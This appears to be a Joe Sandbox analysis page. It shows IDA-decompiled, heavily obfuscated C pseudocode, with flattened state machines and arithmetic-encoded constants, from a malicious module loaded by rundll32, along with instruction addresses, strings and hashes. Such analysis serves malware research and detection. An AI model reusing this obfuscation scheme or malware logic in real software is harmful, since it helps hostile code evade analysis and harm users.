				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x2d585a45;
				 *(_t382 + 0x28) = 0xad3d;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) + 0xffffae8b;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) >> 2;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) << 7;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x000b51d9;
				 *(_t382 + 0x58) = 0xde2;
				_t342 = 0x39;
				 *(_t382 + 0x54) =  *(_t382 + 0x58) * 0x34;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) / _t342;
				 *(_t382 + 0x54) =  *(_t382 + 0x54) ^ 0x00000d30;
				 *(_t382 + 0x1c) = 0xba82;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) << 4;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) >> 0xc;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b4b7c;
				 *(_t382 + 0x1c) =  *(_t382 + 0x1c) ^ 0xd59b12fd;
				 *(_t382 + 0x40) = 0xa3d9;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd82378ca;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) + 0xffff3c17;
				 *(_t382 + 0x40) =  *(_t382 + 0x40) ^ 0xd8236a86;
				 *(_t382 + 0x5c) = 0xecab;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) >> 0x10;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d98124e;
				 *(_t382 + 0x5c) =  *(_t382 + 0x5c) ^ 0x7d9832d2;
				 *(_t382 + 0x80) = 0x1387;
				_t343 = 0x2a;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) * 0x63;
				 *(_t382 + 0x80) =  *(_t382 + 0x80) ^ 0x0007c428;
				 *(_t382 + 0x4c) = 0x7ada;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) * 0x39;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) + 0xffffefa5;
				 *(_t382 + 0x4c) =  *(_t382 + 0x4c) ^ 0x001b3452;
				 *(_t382 + 0x90) = 0x1591;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) >> 8;
				 *(_t382 + 0x90) =  *(_t382 + 0x90) ^ 0x0000431e;
				 *(_t382 + 0x2c) = 0x3f89;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 5;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) | 0xff33b819;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) << 7;
				 *(_t382 + 0x2c) =  *(_t382 + 0x2c) ^ 0x9bfcb078;
				 *(_t382 + 0x98) = 0x7441;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) / _t343;
				 *(_t382 + 0x98) =  *(_t382 + 0x98) ^ 0x000035d7;
				 *(_t382 + 0x48) = 0x7f1e;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) + 0x7f31;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) << 0xe;
				 *(_t382 + 0x48) =  *(_t382 + 0x48) ^ 0x3f939bef;
				 *(_t382 + 0x8c) = 0x831c;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) << 8;
				 *(_t382 + 0x8c) =  *(_t382 + 0x8c) ^ 0x008363dd;
				 *(_t382 + 0x30) = 0x92b6;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) + 0xa4c2;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 0xc;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) << 8;
				 *(_t382 + 0x30) =  *(_t382 + 0x30) ^ 0x77802bdf;
				 *(_t382 + 0x28) = 0x1d89;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0xf9709c7c;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) * 0x25;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) | 0x703957df;
				 *(_t382 + 0x28) =  *(_t382 + 0x28) ^ 0x7d7fbb45;
				 *(_t382 + 0x58) = 0x126d;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 3;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) >> 9;
				 *(_t382 + 0x58) =  *(_t382 + 0x58) ^ 0x000002d5;
				 *(_t382 + 0x7c) = 0x1a69;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) | 0x10216cf6;
				 *(_t382 + 0x7c) =  *(_t382 + 0x7c) ^ 0x102141be;
				 *(_t382 + 0x20) = 0xff0b;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) >> 0x10;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) << 7;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) * 0x21;
				 *(_t382 + 0x20) =  *(_t382 + 0x20) ^ 0x000040df;
				 *(_t382 + 0x6c) = 0xe12c;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) + 0x79cf;
				 *(_t382 + 0x6c) =  *(_t382 + 0x6c) ^ 0x000152eb;
				 *(_t382 + 0x34) = 0xd574;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) | 0x9559dde1;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0x4f646285;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) + 0xffff68ed;
				 *(_t382 + 0x34) =  *(_t382 + 0x34) ^ 0xda3d1e7a;
				 *(_t382 + 0x88) = 0x5832;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) * 0x27;
				 *(_t382 + 0x88) =  *(_t382 + 0x88) ^ 0x000d0611;
				 *(_t382 + 0x50) = 0x55a1;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) << 0xf;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x45d5d069;
				 *(_t382 + 0x50) =  *(_t382 + 0x50) ^ 0x6f0533ce;
				 *(_t382 + 0x14) = 0xc073;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) + 0xffffd37e;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 3;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) << 4;
				 *(_t382 + 0x14) =  *(_t382 + 0x14) ^ 0x0049a7c7;
				 *(_t382 + 0x94) = 0xf1be;
				_t337 =  *((intOrPtr*)(_t382 + 0xa0));
				_t344 = 0xa;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) / _t344;
				 *(_t382 + 0x94) =  *(_t382 + 0x94) ^ 0x00002403;
				 *(_t382 + 0x60) = 0x96ef;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) + 0xfa48;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) | 0xbd3809b4;
				 *(_t382 + 0x60) =  *(_t382 + 0x60) ^ 0xbd39967f;
				 *(_t382 + 0x38) = 0xec0c;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) + 0x6908;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) * 0x26;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) >> 9;
				 *(_t382 + 0x38) =  *(_t382 + 0x38) ^ 0x00001f14;
				do {
					while(_t376 != 0x3ac0a14) {
						if(_t376 == 0x7fec1df) {
							_t344 = _t382 + 0x2ac;
							E00B30D33(_t382 + 0x2ac,  *(_t382 + 0x48), __eflags,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x14),  *((intOrPtr*)(_t382 + 0x24)));
							_t382 = _t382 + 0xc;
							_t376 = 0x12c07630;
							continue;
						} else {
							if(_t376 == 0x12c07630) {
								_push( *(_t382 + 0x1c));
								E00B229E3(_t382 + 0x2b0, 0x104, E00B3889D( *((intOrPtr*)(_t382 + 0x4b8)),  *(_t382 + 0x58), __eflags),  *(_t382 + 0x5c),  *(_t382 + 0x74),  *(_t382 + 0x94),  *((intOrPtr*)(_t382 + 0xac)),  *((intOrPtr*)(_t382 + 0x4c4)),  *(_t382 + 0x54),  *(_t382 + 0x94));
								_t344 =  *(_t382 + 0x5c);
								E00B32025( *(_t382 + 0x5c), _t327,  *((intOrPtr*)(_t382 + 0xc4)),  *((intOrPtr*)(_t382 + 0x70)));
								_t382 = _t382 + 0x30;
								_t376 = 0x3ac0a14;
								continue;
							} else {
								if(_t376 == 0x1f5a6ea2) {
									_t376 = 0x2b635c32;
									continue;
								} else {
									if(_t376 == 0x2b635c32) {
										E00B33E3F(_t344, _t382 + 0xa4, __eflags,  *(_t382 + 0x68),  *((intOrPtr*)(_t382 + 0x70)));
										_t331 = E00B228CE(_t382 + 0xac,  *(_t382 + 0x50),  *(_t382 + 0x80));
										_t382 = _t382 + 0xc;
										_t376 = 0x7fec1df;
										_t344 = 0;
										 *_t331 = 0;
										continue;
									} else {
										if(_t376 == 0x2c9ad714) {
											E00B34F7D( *(_t382 + 0x60),  *(_t382 + 0x38), _t337);
										} else {
											if(_t376 != 0x33ecfade) {
												goto L16;
											} else {
												_t263 = _t380 + 4; // 0xedb0bf04
												E00B36CAA( *(_t382 + 0x4c),  *((intOrPtr*)(_t382 + 0xa0)), _t337, _t263,  *(_t382 + 0x64),  *_t380,  *(_t382 + 0x20), _t344,  *_t263,  *(_t382 + 0x94));
												_t382 = _t382 + 0x20;
												_t344 = 1;
												_t376 = 0x2c9ad714;
												_t373 =  !=  ? 1 : _t373;
												continue;
											}
										}
									}
								}
							}
						}
						L19:
						return _t373;
					}
					_t325 = E00B2B566(_t344, 0,  *((intOrPtr*)(_t382 + 0xb8)),  *(_t382 + 0x58),  *((intOrPtr*)(_t382 + 0xa8)),  *(_t382 + 0x48), _t344,  *((intOrPtr*)(_t382 + 0x70)),  *(_t382 + 0x90),  *((intOrPtr*)(_t382 + 0x84)),  *(_t382 + 0x2c),  *(_t382 + 0x74),  *(_t382 + 0x1c),  *((intOrPtr*)(_t382 + 0x4b8)));
					_t337 = _t325;
					_t382 = _t382 + 0x30;
					__eflags = _t325 - 0xffffffff;
					if(__eflags == 0) {
						_t376 = 0x18af80d5;
						goto L16;
					} else {
						_t376 = 0x33ecfade;
						continue;
					}
					goto L19;
					L16:
					__eflags = _t376 - 0x18af80d5;
				} while (__eflags != 0);
				goto L19;
			}

0x00b288eb
0x00b288f3
0x00b288fb
0x00b28900
0x00b28905
0x00b2890d
0x00b28915
0x00b2891d
0x00b28925
0x00b28935
0x00b28937
0x00b28942
0x00b28944
0x00b28949
0x00b28952
0x00b2895d
0x00b28962
0x00b2896a
0x00b28972
0x00b2897a
0x00b28982
0x00b28987
0x00b2898f
0x00b2899c
0x00b2899f
0x00b289a3
0x00b289ab
0x00b289b3
0x00b289bb
0x00b289c3
0x00b289cb
0x00b289d3
0x00b289e3
0x00b289e7
0x00b289ef
0x00b289f7
0x00b289ff
0x00b28a07
0x00b28a0f
0x00b28a14
0x00b28a1c
0x00b28a24
0x00b28a2c
0x00b28a34
0x00b28a3c
0x00b28a41
0x00b28a46
0x00b28a4e
0x00b28a5b
0x00b28a5c
0x00b28a66
0x00b28a6a
0x00b28a72
0x00b28a7a
0x00b28a7f
0x00b28a84
0x00b28a8c
0x00b28a94
0x00b28a9c
0x00b28aa4
0x00b28aac
0x00b28ab4
0x00b28abc
0x00b28ac1
0x00b28acb
0x00b28ad3
0x00b28ae8
0x00b28ae9
0x00b28af0
0x00b28afb
0x00b28b08
0x00b28b0c
0x00b28b14
0x00b28b1c
0x00b28b27
0x00b28b2f
0x00b28b3a
0x00b28b42
0x00b28b47
0x00b28b4f
0x00b28b54
0x00b28b5c
0x00b28b70
0x00b28b77
0x00b28b82
0x00b28b8a
0x00b28b92
0x00b28b97
0x00b28b9f
0x00b28baa
0x00b28bb2
0x00b28bbd
0x00b28bc5
0x00b28bcd
0x00b28bd2
0x00b28bd7
0x00b28bdf
0x00b28be7
0x00b28bf4
0x00b28bf8
0x00b28c00
0x00b28c08
0x00b28c10
0x00b28c15
0x00b28c1a
0x00b28c22
0x00b28c2a
0x00b28c32
0x00b28c3a
0x00b28c42
0x00b28c47
0x00b28c51
0x00b28c55
0x00b28c5d
0x00b28c65
0x00b28c6d
0x00b28c75
0x00b28c7d
0x00b28c85
0x00b28c8d
0x00b28c95
0x00b28c9d
0x00b28cb0
0x00b28cb7
0x00b28cc2
0x00b28cca
0x00b28ccf
0x00b28cd7
0x00b28cdf
0x00b28ce7
0x00b28cef
0x00b28cf4
0x00b28cf9
0x00b28d01
0x00b28d17
0x00b28d1e
0x00b28d21
0x00b28d28
0x00b28d33
0x00b28d3b
0x00b28d43
0x00b28d4b
0x00b28d53
0x00b28d5b
0x00b28d68
0x00b28d6c
0x00b28d71
0x00b28d79
0x00b28d79
0x00b28d8b
0x00b28ecd
0x00b28ee0
0x00b28ee5
0x00b28ee8
0x00000000
0x00b28d91
0x00b28d97
0x00b28e4f
0x00b28ea1
0x00b28eb3
0x00b28eb7
0x00b28ebc
0x00b28ebf
0x00000000
0x00b28d9d
0x00b28da3
0x00b28e45
0x00000000
0x00b28da9
0x00b28daf
0x00b28e17
0x00b28e2e
0x00b28e33
0x00b28e36
0x00b28e3b
0x00b28e3d
0x00000000
0x00b28db1
0x00b28db7
0x00b28f65
0x00b28dbd
0x00b28dc3
0x00000000
0x00b28dc9
0x00b28dd0
0x00b28dee
0x00b28df5
0x00b28df8
0x00b28df9
0x00b28e00
0x00000000
0x00b28e00
0x00b28dc3
0x00b28db7
0x00b28daf
0x00b28da3
0x00b28d97
0x00b28f6b
0x00b28f77
0x00b28f77
0x00b28f30
0x00b28f35
0x00b28f37
0x00b28f3a
0x00b28f3d
0x00b28f49
0x00000000
0x00b28f3f
0x00b28f3f
0x00000000
0x00b28f3f
0x00000000
0x00b28f4e
0x00b28f4e
0x00b28f4e
0x00000000

Strings

2\c+, xrefs: 00B28DA9
2X, xrefs: 00B28C9D
2\c+, xrefs: 00B28E45
At, xrefs: 00B28B5C
Ui=, xrefs: 00B28915
0, xrefs: 00B28A6A
Q#JK, xrefs: 00B289AB
EZX-, xrefs: 00B28A24
,, xrefs: 00B28C5D

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID: CloseHandle
String ID: ,$0$2X$2\c+$2\c+$At$EZX-$Q#JK$Ui=
API String ID: 2962429428-1096774584
Opcode ID: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
Instruction ID: 205b859a53385edbb68699ad11a76400825b12b1f2eee93c1c3f43f70771bb05
Opcode Fuzzy Hash: c6f97d9852e594908297d7dc3ae08885571f18f7e498a7c9f787d4f134a9b738
Instruction Fuzzy Hash: 39F110725083809FD368CF65D48A64BFBE1BBC4758F108A1DF1DA962A0C7B98949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00B326F5, Relevance: 11.5, Strings: 9, Instructions: 225
COMMONCrypto

Download Yara Rule

C-Code - Quality: 96%

			E00B326F5(intOrPtr __ecx, intOrPtr* __edx) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				void* __edi;
				void* __ebp;
				intOrPtr _t199;
				intOrPtr _t201;
				void* _t202;
				intOrPtr _t204;
				intOrPtr _t208;
				intOrPtr _t209;
				intOrPtr* _t210;
				signed int _t212;
				signed int _t213;
				signed int _t214;
				signed int _t215;
				void* _t216;
				void* _t224;
				void* _t237;
				intOrPtr _t241;
				void* _t242;
				intOrPtr _t246;
				signed int* _t247;

				_t247 =  &_v88;
				_v12 = 0x29be25;
				_v8 = 0x714c58;
				_t241 = 0;
				_t210 = __edx;
				_v4 = 0;
				_v28 = 0x1199;
				_t246 = __ecx;
				_v28 = _v28 + 0xffffe920;
				_t242 = 0x2efb68f6;
				_v28 = _v28 ^ 0xffffad72;
				_v32 = 0x5bb2;
				_t212 = 0x22;
				_v32 = _v32 / _t212;
				_v32 = _v32 ^ 0x00002aec;
				_v56 = 0xeb34;
				_t213 = 0x1b;
				_v56 = _v56 * 0x6a;
				_v56 = _v56 + 0x2965;
				_v56 = _v56 ^ 0x0061feda;
				_v84 = 0xfe4e;
				_v84 = _v84 + 0xd2a6;
				_v84 = _v84 >> 3;
				_v84 = _v84 | 0x3d0bc2c6;
				_v84 = _v84 ^ 0x3d0bc81e;
				_v20 = 0x5db0;
				_v20 = _v20 + 0xffffd438;
				_v20 = _v20 ^ 0x00005602;
				_v24 = 0xa932;
				_v24 = _v24 * 0x1f;
				_v24 = _v24 ^ 0x00145068;
				_v88 = 0xc29f;
				_v88 = _v88 * 0x34;
				_v88 = _v88 ^ 0xcbbf1de0;
				_v88 = _v88 + 0x67bb;
				_v88 = _v88 ^ 0xcb98f8b4;
				_v36 = 0x7c84;
				_v36 = _v36 + 0x6da7;
				_v36 = _v36 ^ 0x0000df84;
				_v60 = 0xf0d8;
				_v60 = _v60 + 0xffffcb07;
				_v60 = _v60 * 0x50;
				_v60 = _v60 ^ 0x003a95e0;
				_v44 = 0x6681;
				_v44 = _v44 + 0xffff19d2;
				_v44 = _v44 / _t213;
				_v44 = _v44 ^ 0x097b3a7d;
				_v16 = 0x94d;
				_v16 = _v16 + 0x4187;
				_v16 = _v16 ^ 0x00007836;
				_v48 = 0x21e9;
				_v48 = _v48 ^ 0x3c92a0ae;
				_v48 = _v48 + 0xf596;
				_v48 = _v48 ^ 0x3c9366ad;
				_v52 = 0x4a04;
				_v52 = _v52 * 0x54;
				_v52 = _v52 ^ 0x56a39f58;
				_v52 = _v52 ^ 0x56bbe121;
				_v80 = 0x166f;
				_v80 = _v80 ^ 0x3bc38db2;
				_v80 = _v80 << 0xd;
				_v80 = _v80 | 0x5d8ccce3;
				_v80 = _v80 ^ 0x7fffd756;
				_v76 = 0xd2e;
				_t214 = 6;
				_v76 = _v76 / _t214;
				_t215 = 0x59;
				_t237 = 0xdd7d922;
				_v76 = _v76 / _t215;
				_v76 = _v76 ^ 0xb1a59fe6;
				_v76 = _v76 ^ 0xb1a5c97b;
				_v40 = 0x2ae1;
				_v40 = _v40 >> 6;
				_v40 = _v40 << 2;
				_v40 = _v40 ^ 0x0000341b;
				_v64 = 0x37cd;
				_v64 = _v64 + 0xffff3540;
				_v64 = _v64 << 1;
				_v64 = _v64 | 0x66261fef;
				_v64 = _v64 ^ 0xfffeb931;
				_v68 = 0x9ed9;
				_v68 = _v68 + 0xad09;
				_v68 = _v68 ^ 0xfd9e5c2b;
				_v68 = _v68 >> 4;
				_v68 = _v68 ^ 0x0fd99075;
				_v72 = 0x1a2d;
				_v72 = _v72 + 0xc4a4;
				_v72 = _v72 << 6;
				_v72 = _v72 * 0x59;
				_v72 = _v72 ^ 0x135ddffd;
				while(1) {
					L1:
					_t216 = 0x2c1c6573;
					while(_t242 != 0x6072d1c) {
						if(_t242 == _t237) {
							_push(_t216);
							_t199 = E00B21132(_v44, _t216, _v16, _t216, _t241, _v48, _v52, _v80, E00B22A30);
							_t247 =  &(_t247[9]);
							 *((intOrPtr*)(_t241 + 0x1c)) = _t199;
							__eflags = _t199;
							_t216 = 0x2c1c6573;
							_t242 =  !=  ? 0x2c1c6573 : 0x6072d1c;
							L13:
							_t237 = 0xdd7d922;
							continue;
						}
						if(_t242 == 0xe9e2879) {
							_push(_v24);
							_t201 = E00B36DB9( *((intOrPtr*)(_t210 + 4)), _t241, _t246, __eflags, _t216,  *_t210, _v84, _v20);
							_t247 =  &(_t247[5]);
							 *((intOrPtr*)(_t241 + 0x28)) = _t201;
							__eflags = _t201;
							_t202 = 0x303a6ade;
							_t242 =  !=  ? 0x303a6ade : 0x28cfd81a;
							L12:
							_t216 = 0x2c1c6573;
							goto L13;
						}
						if(_t242 == 0x28cfd81a) {
							return E00B2F536(_v64, _v68, _v72, _t241);
						}
						if(_t242 == _t216) {
							 *((intOrPtr*)(_t241 + 0x24)) = _t246;
							_t204 =  *0xb3ca24; // 0x0
							 *((intOrPtr*)(_t241 + 0x2c)) = _t204;
							 *0xb3ca24 = _t241;
							return _t204;
						}
						if(_t242 != 0x2efb68f6) {
							if(_t242 != _t202) {
								L17:
								__eflags = _t242 - 0x35b12720;
								if(__eflags != 0) {
									continue;
								} else {
									return _t202;
								}
								L22:
							} else {
								_t209 = E00B276DB( *((intOrPtr*)(_t241 + 0x28)), _v88, _v36, _v60);
								_t247 =  &(_t247[2]);
								 *((intOrPtr*)(_t241 + 4)) = _t209;
								_t237 = 0xdd7d922;
								_t242 =  !=  ? 0xdd7d922 : 0x6072d1c;
								goto L1;
							}
						}
						_push(_t216);
						_push(_t216);
						_t224 = 0x38;
						_t208 = E00B28736(_t224);
						_t241 = _t208;
						__eflags = _t241;
						if(__eflags != 0) {
							_t242 = 0xe9e2879;
							_t202 = 0x303a6ade;
							goto L12;
						}
						return _t208;
						goto L22;
					}
					E00B3422C(_v76,  *((intOrPtr*)(_t241 + 0x28)), _v40);
					_t242 = 0x28cfd81a;
					_t216 = 0x2c1c6573;
					_t237 = 0xdd7d922;
					goto L17;
				}
			}

0x00b326f5
0x00b326f8
0x00b32700
0x00b3270c
0x00b3270e
0x00b32710
0x00b32716
0x00b3271e
0x00b32720
0x00b32728
0x00b3272d
0x00b32735
0x00b32743
0x00b32748
0x00b3274e
0x00b32756
0x00b32763
0x00b32764
0x00b32768
0x00b32770
0x00b32778
0x00b32780
0x00b32788
0x00b3278d
0x00b32795
0x00b3279d
0x00b327a5
0x00b327ad
0x00b327b5
0x00b327c2
0x00b327c6
0x00b327ce
0x00b327db
0x00b327df
0x00b327e7
0x00b327ef
0x00b327f7
0x00b327ff
0x00b32807
0x00b3280f
0x00b32817
0x00b32824
0x00b32828
0x00b32830
0x00b32838
0x00b32846
0x00b3284a
0x00b32852
0x00b3285a
0x00b32862
0x00b3286a
0x00b32872
0x00b3287a
0x00b32882
0x00b3288a
0x00b32897
0x00b3289b
0x00b328a3
0x00b328ab
0x00b328b3
0x00b328bb
0x00b328c0
0x00b328c8
0x00b328d0
0x00b328e0
0x00b328e5
0x00b328ef
0x00b328f2
0x00b328f7
0x00b328fb
0x00b32903
0x00b3290b
0x00b32913
0x00b32918
0x00b3291d
0x00b32925
0x00b3292d
0x00b32935
0x00b32939
0x00b32941
0x00b32949
0x00b32951
0x00b32959
0x00b32961
0x00b32966
0x00b3296e
0x00b32976
0x00b3297e
0x00b32988
0x00b3298c
0x00b32994
0x00b32994
0x00b32999
0x00b3299e
0x00b329ac
0x00b32a76
0x00b32a93
0x00b32a98
0x00b32a9b
0x00b32a9e
0x00b32aa5
0x00b32aaf
0x00b32a3e
0x00b32a3e
0x00000000
0x00b32a3e
0x00b329b8
0x00b32a48
0x00b32a5a
0x00b32a5f
0x00b32a62
0x00b32a65
0x00b32a6c
0x00b32a71
0x00b32a39
0x00b32a39
0x00000000
0x00b32a39
0x00b329c4
0x00000000
0x00b32b0d
0x00b329cc
0x00b32ae7
0x00b32aea
0x00b32aef
0x00b32af2
0x00000000
0x00b32af2
0x00b329d8
0x00b329dc
0x00b32ad9
0x00b32ad9
0x00b32adf
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00b329e2
0x00b329f1
0x00b329f6
0x00b329f9
0x00b32a03
0x00b32a08
0x00000000
0x00b32a08
0x00b329dc
0x00b32a19
0x00b32a1a
0x00b32a1d
0x00b32a1e
0x00b32a23
0x00b32a27
0x00b32a29
0x00b32a2f
0x00b32a34
0x00000000
0x00b32a34
0x00b32b15
0x00000000
0x00b32b15
0x00b32abf
0x00b32ac5
0x00b32acf
0x00b32ad4
0x00000000
0x00b32ad4

Strings

e), xrefs: 00B32768
4, xrefs: 00B32756
!, xrefs: 00B3286A
6x, xrefs: 00B32862
}:{, xrefs: 00B3284A
*, xrefs: 00B3290B
*, xrefs: 00B3274E
XLq, xrefs: 00B32700
., xrefs: 00B328D0

Memory Dump Source

Source File: 00000007.00000002.2107903712.0000000000B21000.00000020.00000001.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000007.00000002.2107895117.0000000000B20000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2107924836.0000000000B3C000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_b20000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: .$4$6x$XLq$e)$}:{$!$*$*
API String ID: 0-323616845
Opcode ID: 7bbab08b5e027acead1659e2c1f51ed056bce176f2d3a21d94c72e42f7eb20ef
Instruction ID: 564e24ff50a857bee264c0cfcad45217b77d16345b4d74445cffbd9b37c7ee75
Opcode Fuzzy Hash: 7bbab08b5e027acead1659e2c1f51ed056bce176f2d3a21d94c72e42f7eb20ef
Instruction Fuzzy Hash: E9A151729083419FD368CF25D88940BFBE1FB84758F108A1DF199AA260D7B5DA49CF87

Uniqueness

Uniqueness Score: -1.00%

Function 00B363C1, Relevance: 11.4, Strings: 9, Instructions: 194
COMMONCrypto

Download Yara Rule

C-Code - Quality: 100%

			E00B363C1() {
				intOrPtr _v4;
				intOrPtr _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t166;
				signed int _t167;
				signed int _t168;
				void* _t173;
				void* _t191;
				intOrPtr _t196;
				signed int _t197;
				signed int _t198;
				signed int _t199;
				signed int _t200;
				signed int _t201;
				intOrPtr _t202;
				intOrPtr* _t203;
				signed int _t204;
				signed int* _t205;

				_t205 =  &_v76;
				_v8 = 0x6b5f41;
				_t196 = 0;
				_t173 = 0x1e312b00;
				_v4 = 0;
				_v40 = 0xbf50;
				_v40 = _v40 + 0xffff4d7d;
				_v40 = _v40 ^ 0x1ff0eb0a;
				_v40 = _v40 ^ 0x1ff1e7c7;
				_v68 = 0xcba5;
				_v68 = _v68 + 0xffffed4d;
				_v68 = _v68 >> 9;
				_v68 = _v68 | 0x05a9bf19;
				_v68 = _v68 ^ 0x05a9faf6;
				_v52 = 0xab70;
				_v52 = _v52 + 0xffff3c3f;
				_v52 = _v52 ^ 0x3be47de3;
				_v52 = _v52 ^ 0xc41b8c81;
				_v20 = 0x4c56;
				_t27 =  &_v20; // 0x4c56
				_t197 = 0x53;
				_v20 =  *_t27 / _t197;
				_v20 = _v20 ^ 0x00006ba4;
				_v44 = 0x4e4f;
				_v44 = _v44 + 0xffff1389;
				_v44 = _v44 ^ 0x6e1bb2f9;
				_v44 = _v44 ^ 0x91e4a702;
				_v48 = 0x9b6d;
				_t198 = 0x15;
				_v48 = _v48 / _t198;
				_v48 = _v48 << 0xe;
				_v48 = _v48 ^ 0x01d9d03e;
				_v16 = 0x7c52;
				_t199 = 0x3a;
				_v16 = _v16 * 0x14;
				_v16 = _v16 ^ 0x0009e5e2;
				_v64 = 0x462a;
				_v64 = _v64 ^ 0x0e1a4a8f;
				_v64 = _v64 >> 3;
				_v64 = _v64 >> 0xc;
				_v64 = _v64 ^ 0x000014fb;
				_v72 = 0x5cc4;
				_v72 = _v72 / _t199;
				_v72 = _v72 + 0x2f24;
				_v72 = _v72 + 0xd2bc;
				_v72 = _v72 ^ 0x000179b4;
				_v24 = 0x30ff;
				_t200 = 0x2a;
				_v24 = _v24 / _t200;
				_v24 = _v24 ^ 0x00007cf0;
				_v28 = 0x85cd;
				_v28 = _v28 ^ 0xf8a4d4b8;
				_v28 = _v28 ^ 0xf8a43927;
				_v76 = 0x1878;
				_v76 = _v76 ^ 0x7099aca3;
				_v76 = _v76 ^ 0x4acb853d;
				_v76 = _v76 + 0xffff4ab7;
				_v76 = _v76 ^ 0x3a511503;
				_v32 = 0x1800;
				_v32 = _v32 << 1;
				_v32 = _v32 ^ 0x00002132;
				_v60 = 0xa25b;
				_v60 = _v60 * 0x67;
				_v60 = _v60 + 0x9ac4;
				_v60 = _v60 ^ 0x004180d5;
				_v36 = 0x47a4;
				_v36 = _v36 << 9;
				_v36 = _v36 ^ 0xcd228633;
				_v36 = _v36 ^ 0xcdadbf4b;
				_v12 = 0xe30d;
				_v12 = _v12 << 8;
				_v12 = _v12 ^ 0x00e3661f;
				_t172 = _v12;
				_t204 = _v12;
				_t201 = _v12;
				_v56 = 0x2740;
				_v56 = _v56 ^ 0x239771de;
				_v56 = _v56 + 0xfffffe7e;
				_v56 = _v56 ^ 0x23985523;
				while(1) {
					L1:
					_t191 = 0x5c;
					while(1) {
						L2:
						do {
							L3:
							while(_t173 != 0x3fc1d7) {
								if(_t173 == 0x353ab5a) {
									_t202 =  *0xb3ca2c; // 0x505cc8
									_t203 = _t202 + 0x230;
									while( *_t203 != _t191) {
										_t203 = _t203 + 2;
									}
									_t201 = _t203 + 2;
									_t173 = 0x6fcf9e2;
									goto L2;
								} else {
									if(_t173 == 0x6adc8a5) {
										_t167 = E00B2F65F(_v40, _v44, _v48, _v16, _t201, _t172, _v64);
										_t205 =  &(_t205[5]);
										_t204 = _t167;
										_t166 = 0xd265085;
										_t173 =  !=  ? 0xd265085 : 0x3fc1d7;
										_t191 = 0x5c;
										continue;
									} else {
										if(_t173 == 0x6fcf9e2) {
